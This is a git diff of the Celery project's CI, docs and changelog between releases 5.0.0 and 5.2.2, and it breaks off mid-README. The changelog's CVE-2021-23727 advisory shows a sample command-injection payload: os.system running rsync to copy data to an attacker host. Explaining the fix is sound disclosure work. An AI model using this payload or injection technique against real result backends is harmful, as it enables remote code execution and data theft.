diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index 80aca1abc6f..481050587d0 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.0.0
+current_version = 5.2.2
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/.github/ISSUE_TEMPLATE/Bug-Report.md b/.github/ISSUE_TEMPLATE/Bug-Report.md
index 9659e4c097e..25a9be322a1 100644
--- a/.github/ISSUE_TEMPLATE/Bug-Report.md
+++ b/.github/ISSUE_TEMPLATE/Bug-Report.md
@@ -13,7 +13,7 @@ bug reports which are incomplete.
To check an item on the list replace [ ] with [x].
-->
- [ ] I have verified that the issue exists against the `master` branch of Celery.
-- [ ] This has already been asked to the [discussion group](https://groups.google.com/forum/#!forum/celery-users) first.
+- [ ] This has already been asked to the [discussions forum](https://github.com/celery/celery/discussions) first.
- [ ] I have read the relevant section in the
[contribution guide](http://docs.celeryproject.org/en/latest/contributing.html#other-bugs)
on reporting bugs.
diff --git a/.github/ISSUE_TEMPLATE/Major-Version-Release-Checklist.md b/.github/ISSUE_TEMPLATE/Major-Version-Release-Checklist.md
index eeecc14df18..20e96f036fd 100644
--- a/.github/ISSUE_TEMPLATE/Major-Version-Release-Checklist.md
+++ b/.github/ISSUE_TEMPLATE/Major-Version-Release-Checklist.md
@@ -18,7 +18,7 @@ Release PR:
- [ ] Release PR reviewed
- [ ] The master branch build passes
- [](https://travis-ci.org/celery/celery)
+ [](https://github.com/celery/celery/actions/workflows/python-package.yml)
- [ ] Release Notes
- [ ] What's New
diff --git a/.github/ISSUE_TEMPLATE/Minor-Version-Release-Checklist.md b/.github/ISSUE_TEMPLATE/Minor-Version-Release-Checklist.md
index 208e34bd77f..c3656043b93 100644
--- a/.github/ISSUE_TEMPLATE/Minor-Version-Release-Checklist.md
+++ b/.github/ISSUE_TEMPLATE/Minor-Version-Release-Checklist.md
@@ -12,7 +12,7 @@ Release PR:
- [ ] Release PR reviewed
- [ ] The master branch build passes
- [](https://travis-ci.org/celery/celery)
+ [](https://github.com/celery/celery/actions/workflows/python-package.yml)
- [ ] Release Notes
- [ ] What's New
diff --git a/.github/opencollective.yml b/.github/opencollective.yml
new file mode 100644
index 00000000000..be703c8b871
--- /dev/null
+++ b/.github/opencollective.yml
@@ -0,0 +1,18 @@
+collective: celery
+tiers:
+ - tiers: '*'
+ labels: ['Backer ❤️']
+ message: 'Hey . Thank you for supporting the project!:heart:'
+ - tiers: ['Basic Sponsor', 'Sponsor', 'Silver Sponsor', 'Gold Sponsor']
+ labels: ['Sponsor ❤️']
+ message: |
+ Thank you for sponsoring the project!:heart::heart::heart:
+ Resolving this issue is one of our top priorities.
+ One of @celery/core-developers will triage it shortly.
+invitation: |
+ Hey :wave:,
+ Thank you for opening an issue. We will get back to you as soon as we can.
+ Also, check out our [Open Collective]() and consider backing us - every little helps!
+
+ We also offer priority support for our sponsors.
+ If you require immediate assistance please consider sponsoring us.
diff --git a/.github/workflows/changerelease.yml b/.github/workflows/changerelease.yml
new file mode 100644
index 00000000000..efbf5a52fef
--- /dev/null
+++ b/.github/workflows/changerelease.yml
@@ -0,0 +1,32 @@
+name: changerelease
+on:
+ workflow_dispatch: {}
+ push:
+ paths: [Changelog.rst]
+ branches: [master]
+ tags: ["*"]
+
+permissions:
+ contents: write
+
+jobs:
+ sync:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - uses: docker://pandoc/core:2.14
+ with:
+ args: "Changelog.rst -f rst -t markdown -o CR_CHANGELOG.md"
+ - name: "Clean up markdown"
+ run: |
+ # https://stackoverflow.com/a/1252191/1110798
+ cat CR_CHANGELOG.md
+ sed -i -e ':a' -e 'N' -e '$!ba' -e 's/release-date\n\n: /Release date: /g' CR_CHANGELOG.md
+ sed -i -e ':a' -e 'N' -e '$!ba' -e 's/release-by\n\n: /Release by: /g' CR_CHANGELOG.md
+ cat CR_CHANGELOG.md
+ - uses: dropseed/changerelease@v1
+ with:
+ github_token: ${{ secrets.GITHUB_TOKEN }}
+ changelog: CR_CHANGELOG.md
+ remote_changelog: false
+ limit: -1
diff --git a/.github/workflows/lint_python.yml b/.github/workflows/lint_python.yml
new file mode 100644
index 00000000000..8c262d25569
--- /dev/null
+++ b/.github/workflows/lint_python.yml
@@ -0,0 +1,17 @@
+name: lint_python
+on: [pull_request, push]
+jobs:
+ lint_python:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - uses: actions/setup-python@v2
+ - uses: pre-commit/action@v2.0.3
+ - run: pip install --upgrade pip wheel
+ - run: pip install bandit codespell flake8 isort pytest pyupgrade tox
+ - run: bandit -r . || true
+ - run: codespell --ignore-words-list="brane,gool,ist,sherif,wil" --quiet-level=2 --skip="*.key" || true
+ - run: pip install -r requirements.txt || true
+ - run: tox || true
+ - run: pytest . || true
+ - run: pytest --doctest-modules . || true
diff --git a/.github/workflows/post_release_to_hacker_news.yml b/.github/workflows/post_release_to_hacker_news.yml
new file mode 100644
index 00000000000..d81bfb22c43
--- /dev/null
+++ b/.github/workflows/post_release_to_hacker_news.yml
@@ -0,0 +1,17 @@
+on:
+ release:
+ types: [released]
+
+jobs:
+ post_release_to_hacker_news:
+ runs-on: ubuntu-latest
+ name: Post Release to Hacker News
+ steps:
+ - name: Post the Release
+ uses: MicahLyle/github-action-post-to-hacker-news@v1
+ env:
+ HN_USERNAME: ${{ secrets.HN_USERNAME }}
+ HN_PASSWORD: ${{ secrets.HN_PASSWORD }}
+ HN_TITLE_FORMAT_SPECIFIER: Celery v%s Released!
+ HN_URL_FORMAT_SPECIFIER: https://docs.celeryproject.org/en/v%s/changelog.html
+ HN_TEST_MODE: true
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
new file mode 100644
index 00000000000..54fdc3596dc
--- /dev/null
+++ b/.github/workflows/python-package.yml
@@ -0,0 +1,70 @@
+# This workflow will install Python dependencies, run tests and lint with a variety of Python versions
+# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
+
+name: Celery
+
+on:
+ push:
+ branches: [ 'master', '5.0' ]
+ paths:
+ - '**.py'
+ - '**.txt'
+ - '.github/workflows/python-package.yml'
+ - '**.toml'
+ pull_request:
+ branches: [ 'master', '5.0' ]
+ paths:
+ - '**.py'
+ - '**.txt'
+ - '**.toml'
+ - '.github/workflows/python-package.yml'
+
+jobs:
+ Unit:
+
+ runs-on: ${{ matrix.os }}
+ strategy:
+ fail-fast: false
+ matrix:
+ python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7','pypy-3.8']
+ os: ["ubuntu-20.04", "windows-2019"]
+
+ steps:
+ - name: Install apt packages
+ if: startsWith(matrix.os, 'ubuntu-')
+ run: |
+ sudo apt update && sudo apt-get install -f libcurl4-openssl-dev libssl-dev gnutls-dev httping expect libmemcached-dev
+ - uses: actions/checkout@v2.4.0
+ - name: Set up Python ${{ matrix.python-version }}
+ uses: actions/setup-python@v2.2.2
+ with:
+ python-version: ${{ matrix.python-version }}
+
+ - name: Get pip cache dir
+ id: pip-cache
+ run: |
+ echo "::set-output name=dir::$(pip cache dir)"
+ - name: Cache
+ uses: actions/cache@v2.1.6
+ with:
+ path: ${{ steps.pip-cache.outputs.dir }}
+ key:
+ ${{ matrix.python-version }}-${{matrix.os}}-${{ hashFiles('**/setup.py') }}
+ restore-keys: |
+ ${{ matrix.python-version }}-${{matrix.os}}
+
+ - name: Install tox
+ run: python -m pip install --upgrade pip tox tox-gh-actions
+ - name: >
+ Run tox for
+ "${{ matrix.python-version }}-unit"
+ timeout-minutes: 20
+ run: |
+ tox --verbose --verbose
+
+ - uses: codecov/codecov-action@v2.1.0
+ with:
+ flags: unittests # optional
+ fail_ci_if_error: true # optional (default = false)
+ verbose: true # optional (default = false)
+
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 5939ad63655..a542597b1c8 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,10 +1,29 @@
repos:
-- repo: https://github.com/ambv/black
- rev: stable
+ - repo: https://github.com/asottile/pyupgrade
+ rev: v2.29.0
hooks:
- - id: black
- language_version: python3.7
-- repo: https://github.com/pre-commit/pre-commit-hooks
- rev: v1.2.3
+ - id: pyupgrade
+ args: ["--py37-plus"]
+
+ - repo: https://github.com/PyCQA/flake8
+ rev: 4.0.1
hooks:
- - id: flake8
+ - id: flake8
+
+ - repo: https://github.com/asottile/yesqa
+ rev: v1.3.0
+ hooks:
+ - id: yesqa
+
+ - repo: https://github.com/pre-commit/pre-commit-hooks
+ rev: v4.0.1
+ hooks:
+ - id: check-merge-conflict
+ - id: check-toml
+ - id: check-yaml
+ - id: mixed-line-ending
+
+ - repo: https://github.com/pycqa/isort
+ rev: 5.10.1
+ hooks:
+ - id: isort
diff --git a/.travis.yml b/.travis.yml
deleted file mode 100644
index 96fb6f4d872..00000000000
--- a/.travis.yml
+++ /dev/null
@@ -1,139 +0,0 @@
-language: python
-dist: bionic
-cache: pip
-python:
- - '3.6'
- - '3.7'
- - '3.8'
- - '3.9-dev'
-os:
- - linux
-stages:
- - test
- - integration
- - lint
-services:
- - redis
- - docker
-env:
- global:
- - PYTHONUNBUFFERED=yes
- - CELERY_TOX_PARALLEL=
- jobs:
- - MATRIX_TOXENV=unit
-
-jobs:
- fast_finish: true
- allow_failures:
- - python: '3.9-dev'
- include:
- - python: '3.9-dev'
- env: MATRIX_TOXENV=integration-rabbitmq
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-rabbitmq
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-redis
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-dynamodb
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-azureblockblob
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-cache
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-cassandra
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-elasticsearch
- stage: integration
-
- - python: '3.8'
- env:
- - TOXENV=flake8,apicheck,configcheck,bandit
- - CELERY_TOX_PARALLEL='--parallel --parallel-live'
- stage: lint
- - python: pypy3.6-7.3.1
- env: TOXENV=pypy3
- stage: test
-
-before_install:
- - sudo install --directory --owner=travis /var/log/celery /var/run/celery
- - sudo apt install libcurl4-openssl-dev libssl-dev gnutls-dev httping expect
- - if [[ -v MATRIX_TOXENV ]]; then export TOXENV=${TRAVIS_PYTHON_VERSION}-${MATRIX_TOXENV}; fi; env
- - |
- if [[ "$TOXENV" == *rabbitmq ]]; then
- docker run -d -p 5672:5672 -p 15672:15672 rabbitmq:3.8-management
- while ! httping -c1 http://127.0.0.1:15672; do sleep 10; done
- fi
- - |
- if [[ "$TOXENV" =~ "pypy" ]]; then
- export PYENV_ROOT="$HOME/.pyenv"
- if [ -f "$PYENV_ROOT/bin/pyenv" ]; then
- cd "$PYENV_ROOT" && git pull
- else
- rm -rf "$PYENV_ROOT" && git clone --depth 1 https://github.com/pyenv/pyenv.git "$PYENV_ROOT"
- fi
- "$PYENV_ROOT/bin/pyenv" install "$PYPY_VERSION"
- virtualenv --python="$PYENV_ROOT/versions/$PYPY_VERSION/bin/python" "$HOME/virtualenvs/$PYPY_VERSION"
- source "$HOME/virtualenvs/$PYPY_VERSION/bin/activate"
- which python
- fi
- - |
- if [[ "$TOXENV" == *dynamodb ]]; then
- docker run -d -p 8000:8000 amazon/dynamodb-local
- while ! httping -c1 http://127.0.0.1:8000; do sleep 10; done
- fi
- - |
- if [[ "$TOXENV" == *cache ]]; then
- docker run -d -p 11211:11211 memcached:alpine
- while ! ./extra/travis/is-memcached-running 127.0.0.1 11211; do sleep 1; done
- fi
- - |
- if [[ "$TOXENV" == *cassandra ]]; then
- cassandra_container_id=$(sudo docker run -d -p 9042:9042 cassandra:latest)
- sudo docker exec $cassandra_container_id /bin/bash -c "while ! cqlsh -e 'describe cluster'; do sleep 1; done"
- sudo docker exec $cassandra_container_id /opt/cassandra/bin/cqlsh -e "CREATE KEYSPACE tests WITH REPLICATION = { 'class' : 'SimpleStrategy', 'replication_factor' : 1 };"
- sleep 1
- sudo docker exec $cassandra_container_id /opt/cassandra/bin/cqlsh -k tests -e "CREATE TABLE tests (task_id text, status text, result blob, date_done timestamp, traceback blob, children blob, PRIMARY KEY ((task_id), date_done)) WITH CLUSTERING ORDER BY (date_done DESC);"
- sleep 1
- fi
- - |
- if [[ "$TOXENV" == *elasticsearch ]]; then
- elasticsearch_container_id=$(sudo docker run -d -p 9200:9200 -e discovery.type=single-node elasticsearch:7.7.0)
- sudo docker exec $elasticsearch_container_id /bin/bash -c "while ! curl '127.0.0.1:9200/_cluster/health?wait_for_status=yellow&timeout=30s'; do sleep 1; done"
- fi
- - |
- docker run -d -e executable=blob -t -p 10000:10000 --tmpfs /opt/azurite/folder:rw arafato/azurite:2.6.5
- while ! httping -c1 http://127.0.0.1:10000; do sleep 10; done
- export AZUREBLOCKBLOB_URL="azureblockblob://DefaultEndpointsProtocol=http;AccountName=devstoreaccount1;AccountKey=Eby8vdM02xNOcqFlqUwJPLlmEtlCDXJ1OUzFT50uSRZ6IFsuFq2UVErCz4I6tq/K1SZFPTOtr/KBHBeksoGMGw==;BlobEndpoint=http://127.0.0.1:10000/devstoreaccount1;"
- - |
- wget -qO - https://packages.couchbase.com/ubuntu/couchbase.key | sudo apt-key add -
- sudo apt-add-repository -y 'deb http://packages.couchbase.com/ubuntu bionic bionic/main'
- sudo apt-get update && sudo apt-get install -y libcouchbase-dev
-install: pip --disable-pip-version-check install --upgrade-strategy eager -U tox | cat
-script: tox $CELERY_TOX_PARALLEL -v -- -v
-after_success:
- - |
- if [[ -v MATRIX_TOXENV || "$TOXENV" =~ "pypy" ]]; then
- .tox/$TOXENV/bin/coverage xml
- .tox/$TOXENV/bin/codecov -e TOXENV
- fi;
-notifications:
- email: false
- irc:
- channels:
- - "chat.freenode.net#celery"
- on_success: change
- on_failure: change
diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst
index 9814b9c7ee4..c96ee55fb1e 100644
--- a/CONTRIBUTING.rst
+++ b/CONTRIBUTING.rst
@@ -40,7 +40,7 @@ The Code of Conduct is heavily based on the `Ubuntu Code of Conduct`_, and
the `Pylons Code of Conduct`_.
.. _`Ubuntu Code of Conduct`: https://www.ubuntu.com/community/conduct
-.. _`Pylons Code of Conduct`: http://docs.pylonshq.com/community/conduct.html
+.. _`Pylons Code of Conduct`: https://pylonsproject.org/community-code-of-conduct.html
Be considerate
--------------
@@ -292,13 +292,12 @@ Branches
Current active version branches:
* dev (which git calls "master") (https://github.com/celery/celery/tree/master)
-* 4.2 (https://github.com/celery/celery/tree/4.2)
-* 4.1 (https://github.com/celery/celery/tree/4.1)
+* 4.5 (https://github.com/celery/celery/tree/v4.5)
* 3.1 (https://github.com/celery/celery/tree/3.1)
You can see the state of any branch by looking at the Changelog:
- https://github.com/celery/celery/blob/master/Changelog
+ https://github.com/celery/celery/blob/master/Changelog.rst
If the branch is in active development the topmost version info should
contain meta-data like:
@@ -447,7 +446,7 @@ fetch and checkout a remote branch like this::
.. _`Fork a Repo`: https://help.github.com/fork-a-repo/
.. _`Rebasing merge commits in git`:
- https://notes.envato.com/developers/rebasing-merge-commits-in-git/
+ https://web.archive.org/web/20150627054345/http://marketblog.envato.com/general/rebasing-merge-commits-in-git/
.. _`Rebase`: https://help.github.com/rebase/
.. _contributing-docker-development:
@@ -494,19 +493,19 @@ Some useful commands to run:
**Note:** This command will run tests for every environment defined in :file:`tox.ini`.
It takes a while.
-* ``pyenv exec python{2.7,3.5,3.6,3.7,3.8} -m pytest t/unit``
+* ``pyenv exec python{3.6,3.7,3.8,3.9} -m pytest t/unit``
To run unit tests using pytest.
- **Note:** ``{2.7,3.5,3.6,3.7,3.8}`` means you can use any of those options.
- e.g. ``pyenv exec python3.6 -m pytest t/unit``
+ **Note:** ``{3.6,3.7,3.8,3.9}`` means you can use any of those options.
+ e.g. ``pyenv exec python3.7 -m pytest t/unit``
-* ``pyenv exec python{2.7,3.5,3.6,3.7,3.8} -m pytest t/integration``
+* ``pyenv exec python{3.6,3.7,3.8,3.9} -m pytest t/integration``
To run integration tests using pytest
- **Note:** ``{2.7,3.5,3.6,3.7,3.8}`` means you can use any of those options.
- e.g. ``pyenv exec python3.6 -m pytest t/unit``
+ **Note:** ``{3.6,3.7,3.8,3.9}`` means you can use any of those options.
+ e.g. ``pyenv exec python3.7 -m pytest t/unit``
By default, docker-compose will mount the Celery and test folders in the Docker
container, allowing code changes and testing to be immediately visible inside
@@ -516,7 +515,7 @@ use are also defined in the :file:`docker/docker-compose.yml` file.
By running ``docker-compose build celery`` an image will be created with the
name ``celery/celery:dev``. This docker image has every dependency needed
for development installed. ``pyenv`` is used to install multiple python
-versions, the docker image offers python 2.7, 3.5, 3.6, 3.7 and 3.8.
+versions, the docker image offers python 3.6, 3.7, 3.8 and 3.9.
The default python version is set to 3.8.
The :file:`docker-compose.yml` file defines the necessary environment variables
@@ -677,7 +676,7 @@ Use the ``tox -e`` option if you only want to test specific Python versions:
.. code-block:: console
- $ tox -e 2.7
+ $ tox -e 3.7
Building the documentation
--------------------------
@@ -711,6 +710,20 @@ After building succeeds, the documentation is available at :file:`_build/html`.
.. _contributing-verify:
+Build the documentation using Docker
+------------------------------------
+
+Build the documentation by running:
+
+.. code-block:: console
+
+ $ docker-compose -f docker/docker-compose.yml up --build docs
+
+The service will start a local docs server at ``:7000``. The server is using
+``sphinx-autobuild`` with the ``--watch`` option enabled, so you can live
+edit the documentation. Check the additional options and configs in
+:file:`docker/docker-compose.yml`
+
Verifying your contribution
---------------------------
@@ -831,14 +844,13 @@ make it easier for the maintainers to accept your proposed changes:
``pytest -xv --cov=celery --cov-report=xml --cov-report term``.
You can check the current test coverage here: https://codecov.io/gh/celery/celery
-- [ ] Run ``flake8`` against the code. The following commands are valid
+- [ ] Run ``pre-commit`` against the code. The following commands are valid
and equivalent.:
.. code-block:: console
- $ flake8 -j 2 celery/ t/
- $ make flakecheck
- $ tox -e flake8
+ $ pre-commit run --all-files
+ $ tox -e lint
- [ ] Build api docs to make sure everything is OK. The following commands are valid
and equivalent.:
diff --git a/CONTRIBUTORS.txt b/CONTRIBUTORS.txt
index 748cabf4d0b..1c497349f54 100644
--- a/CONTRIBUTORS.txt
+++ b/CONTRIBUTORS.txt
@@ -277,3 +277,12 @@ Kyle Johnson, 2019/09/23
Dipankar Achinta, 2019/10/24
Sardorbek Imomaliev, 2020/01/24
Maksym Shalenyi, 2020/07/30
+Frazer McLean, 2020/09/29
+Henrik Bruåsdal, 2020/11/29
+Tom Wojcik, 2021/01/24
+Ruaridh Williamson, 2021/03/09
+Garry Lawrence, 2021/06/19
+Patrick Zhang, 2017/08/19
+Konstantin Kochin, 2021/07/11
+kronion, 2021/08/26
+Gabor Boros, 2021/11/09
diff --git a/Changelog.rst b/Changelog.rst
index a8fc6d47665..c5cfddf4075 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -5,65 +5,202 @@
================
This document contains change notes for bugfix & new features
-in the 5.0.x series, please see :ref:`whatsnew-5.0` for
-an overview of what's new in Celery 5.0.
+in the & 5.2.x series, please see :ref:`whatsnew-5.2` for
+an overview of what's new in Celery 5.2.
+.. _version-5.2.2:
-5.0.0
+5.2.2
=====
-:release-date: 2020-09-24 6.00 P.M UTC+3:00
+
+:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz
-- **Breaking Change** Remove AMQP result backend (#6360).
-- Warn when deprecated settings are used (#6353).
-- Expose retry_policy for Redis result backend (#6330).
-- Prepare Celery to support the yet to be released Python 3.9 (#6328).
+- Various documentation fixes.
+- Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
-5.0.0rc3
-========
-:release-date: 2020-09-07 4.00 P.M UTC+3:00
-:release-by: Omer Katz
+ When a task fails, the failure information is serialized in the backend.
+ In some cases, the exception class is only importable from the
+ consumer's code base. In this case, we reconstruct the exception class
+ so that we can re-raise the error on the process which queried the
+ task's result. This was introduced in #4836.
+ If the recreated exception type isn't an exception, this is a security issue.
+ Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
+ ``os.system("rsync /data attacker@192.168.56.100:~/data")``
+ by setting the task's result to a failure in the result backend with the os,
+ the system function as the exception type and the payload ``rsync /data attacker@192.168.56.100:~/data`` as the exception arguments like so:
-- More cleanups of leftover Python 2 support (#6338).
+ .. code-block:: python
+
+ {
+ "exc_module": "os",
+ 'exc_type': "system",
+ "exc_message": "rsync /data attacker@192.168.56.100:~/data"
+ }
+
+ According to my analysis, this vulnerability can only be exploited if
+ the producer delayed a task which runs long enough for the
+ attacker to change the result mid-flight, and the producer has
+ polled for the task's result.
+ The attacker would also have to gain access to the result backend.
+ The severity of this security vulnerability is low, but we still
+ recommend upgrading.
+
+
+.. _version-5.2.1:
+
+5.2.1
+=====
+
+:release-date: 2021-11-16 8.55 P.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Fix rstrip usage on bytes instance in ProxyLogger.
+- Pass logfile to ExecStop in celery.service example systemd file.
+- fix: reduce latency of AsyncResult.get under gevent (#7052)
+- Limit redis version: <4.0.0.
+- Bump min kombu version to 5.2.2.
+- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
+- Remove dependency to case (#7077).
+- fix: task expiration is timezone aware if needed (#7065).
+- Initial testing of pypy-3.8 beta to CI.
+- Docs, CI & tests cleanups.
-5.0.0rc2
-========
-:release-date: 2020-09-01 6.30 P.M UTC+3:00
-:release-by: Omer Katz
-- Bump minimum required eventlet version to 0.26.1.
-- Update Couchbase Result backend to use SDK V3.
-- Restore monkeypatching when gevent or eventlet are used.
+.. _version-5.2.0:
-5.0.0rc1
+5.2.0
+=====
+
+:release-date: 2021-11-08 7.15 A.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Prevent from subscribing to empty channels (#7040)
+- fix register_task method.
+- Fire task failure signal on final reject (#6980)
+- Limit pymongo version: <3.12.1 (#7041)
+- Bump min kombu version to 5.2.1
+
+.. _version-5.2.0rc2:
+
+5.2.0rc2
========
-:release-date: 2020-08-24 9.00 P.M UTC+3:00
-:release-by: Omer Katz
-- Allow to opt out of ordered group results when using the Redis result backend (#6290).
-- **Breaking Change** Remove the deprecated celery.utils.encoding module.
+:release-date: 2021-11-02 1.54 P.M UTC+3:00
+:release-by: Naomi Elstein
+
+- Bump Python 3.10.0 to rc2.
+- [pre-commit.ci] pre-commit autoupdate (#6972).
+- autopep8.
+- Prevent worker to send expired revoked items upon hello command (#6975).
+- docs: clarify the 'keeping results' section (#6979).
+- Update deprecated task module removal in 5.0 documentation (#6981).
+- [pre-commit.ci] pre-commit autoupdate.
+- try python 3.10 GA.
+- mention python 3.10 on readme.
+- Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
+- Azure blockblob backend parametrized connection/read timeouts (#6978).
+- Add as_uri method to azure block blob backend.
+- Add possibility to override backend implementation with celeryconfig (#6879).
+- [pre-commit.ci] pre-commit autoupdate.
+- try to fix deprecation warning.
+- [pre-commit.ci] pre-commit autoupdate.
+- not needed anyore.
+- not needed anyore.
+- not used anymore.
+- add github discussions forum
+
+.. _version-5.2.0rc1:
+
+5.2.0rc1
+========
+:release-date: 2021-09-26 4.04 P.M UTC+3:00
+:release-by: Omer Katz
-5.0.0b1
+- Kill all workers when main process exits in prefork model (#6942).
+- test kombu 5.2.0rc1 (#6947).
+- try moto 2.2.x (#6948).
+- Prepared Hacker News Post on Release Action.
+- update setup with python 3.7 as minimum.
+- update kombu on setupcfg.
+- Added note about automatic killing all child processes of worker after its termination.
+- [pre-commit.ci] pre-commit autoupdate.
+- Move importskip before greenlet import (#6956).
+- amqp: send expiration field to broker if requested by user (#6957).
+- Single line drift warning.
+- canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
+- Allow to enable Events with app.conf mechanism.
+- Warn when expiration date is in the past.
+- Add the Framework :: Celery trove classifier.
+- Give indication whether the task is replacing another (#6916).
+- Make setup.py executable.
+- Bump version: 5.2.0b3 → 5.2.0rc1.
+
+.. _version-5.2.0b3:
+
+5.2.0b3
=======
-:release-date: 2020-08-19 8.30 P.M UTC+3:00
-:release-by: Omer Katz
-- **Breaking Change** Drop support for the Riak result backend (#5686).
-- **Breaking Change** pytest plugin is no longer enabled by default (#6288).
- Install pytest-celery to enable it.
-- **Breaking Change** Brand new CLI based on Click (#5718).
+:release-date: 2021-09-02 8.38 P.M UTC+3:00
+:release-by: Omer Katz
-5.0.0a2
+- Add args to LOG_RECEIVED (fixes #6885) (#6898).
+- Terminate job implementation for eventlet concurrency backend (#6917).
+- Add cleanup implementation to filesystem backend (#6919).
+- [pre-commit.ci] pre-commit autoupdate (#69).
+- Add before_start hook (fixes #4110) (#6923).
+- Restart consumer if connection drops (#6930).
+- Remove outdated optimization documentation (#6933).
+- added https verification check functionality in arangodb backend (#6800).
+- Drop Python 3.6 support.
+- update supported python versions on readme.
+- [pre-commit.ci] pre-commit autoupdate (#6935).
+- Remove appveyor configuration since we migrated to GA.
+- pyugrade is now set to upgrade code to 3.7.
+- Drop exclude statement since we no longer test with pypy-3.6.
+- 3.10 is not GA so it's not supported yet.
+- Celery 5.1 or earlier support Python 3.6.
+- Fix linting error.
+- fix: Pass a Context when chaining fail results (#6899).
+- Bump version: 5.2.0b2 → 5.2.0b3.
+
+.. _version-5.2.0b2:
+
+5.2.0b2
=======
-:release-date: 2020-08-05 7.15 P.M UTC+3:00
+
+:release-date: 2021-08-17 5.35 P.M UTC+3:00
:release-by: Omer Katz
-- Bump Kombu version to 5.0 (#5686).
+- Test windows on py3.10rc1 and pypy3.7 (#6868).
+- Route chord_unlock task to the same queue as chord body (#6896).
+- Add message properties to app.tasks.Context (#6818).
+- handle already converted LogLevel and JSON (#6915).
+- 5.2 is codenamed dawn-chorus.
+- Bump version: 5.2.0b1 → 5.2.0b2.
+
+.. _version-5.2.0b1:
-5.0.0a1
+5.2.0b1
=======
-:release-date: 2020-08-02 9.30 P.M UTC+3:00
+
+:release-date: 2021-08-11 5.42 P.M UTC+3:00
:release-by: Omer Katz
-- Removed most of the compatibility code that supports Python 2 (#5686).
-- Modernized code to work on Python 3.6 and above (#5686).
+- Add Python 3.10 support (#6807).
+- Fix docstring for Signal.send to match code (#6835).
+- No blank line in log output (#6838).
+- Chords get body_type independently to handle cases where body.type does not exist (#6847).
+- Fix #6844 by allowing safe queries via app.inspect().active() (#6849).
+- Fix multithreaded backend usage (#6851).
+- Fix Open Collective donate button (#6848).
+- Fix setting worker concurrency option after signal (#6853).
+- Make ResultSet.on_ready promise hold a weakref to self (#6784).
+- Update configuration.rst.
+- Discard jobs on flush if synack isn't enabled (#6863).
+- Bump click version to 8.0 (#6861).
+- Amend IRC network link to Libera (#6837).
+- Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872).
+- Fix inspect --json output to return valid json without --quiet.
+- Remove celery.task references in modules, docs (#6869).
+- The Consul backend must correctly associate requests and responses (#6823).
diff --git a/README.rst b/README.rst
index cb2d07c42f9..78172ff29a5 100644
--- a/README.rst
+++ b/README.rst
@@ -2,8 +2,8 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.0.0 (singularity)
-:Web: http://celeryproject.org/
+:Version: 5.2.2 (dawn-chorus)
+:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
:Keywords: task, queue, job, async, rabbitmq, amqp, redis,
@@ -57,21 +57,22 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.0.0 runs on,
+Celery version 5.2.0 runs on,
-- Python (3.6, 3.7, 3.8)
-- PyPy3.6 (7.6)
+- Python (3.7, 3.8, 3.9, 3.10)
+- PyPy3.7 (7.3.7+)
-This is the next version to of celery which will support Python 3.6 or newer.
+This is the version of celery which will support Python 3.7 or newer.
If you're running an older version of Python, you need to be running
an older version of Celery:
- Python 2.6: Celery series 3.1 or earlier.
- Python 2.5: Celery series 3.0 or earlier.
-- Python 2.4 was Celery series 2.2 or earlier.
+- Python 2.4: Celery series 2.2 or earlier.
- Python 2.7: Celery 4.x series.
+- Python 3.6: Celery 5.1 or earlier.
Celery is a project with minimal funding,
so we don't support Microsoft Windows.
@@ -89,7 +90,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.0 coming from previous versions then you should read our
+new to Celery v5.2.0 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
@@ -106,6 +107,8 @@ getting started tutorials:
.. _`Next steps`:
http://docs.celeryproject.org/en/latest/getting-started/next-steps.html
+ You can also get started with Celery by using a hosted broker transport CloudAMQP. The largest hosting provider of RabbitMQ is a proud sponsor of Celery.
+
Celery is...
=============
@@ -116,7 +119,9 @@ Celery is...
It has an active, friendly community you can talk to for support,
like at our `mailing-list`_, or the IRC channel.
- Here's one of the simplest applications you can make::
+ Here's one of the simplest applications you can make:
+
+ .. code-block:: python
from celery import Celery
@@ -253,9 +258,9 @@ separating them by commas.
::
- $ pip install "celery[librabbitmq]"
+ $ pip install "celery[amqp]"
- $ pip install "celery[librabbitmq,redis,auth,msgpack]"
+ $ pip install "celery[amqp,redis,auth,msgpack]"
The following bundles are available:
@@ -283,8 +288,8 @@ Concurrency
Transports and Backends
~~~~~~~~~~~~~~~~~~~~~~~
-:``celery[librabbitmq]``:
- for using the librabbitmq C library.
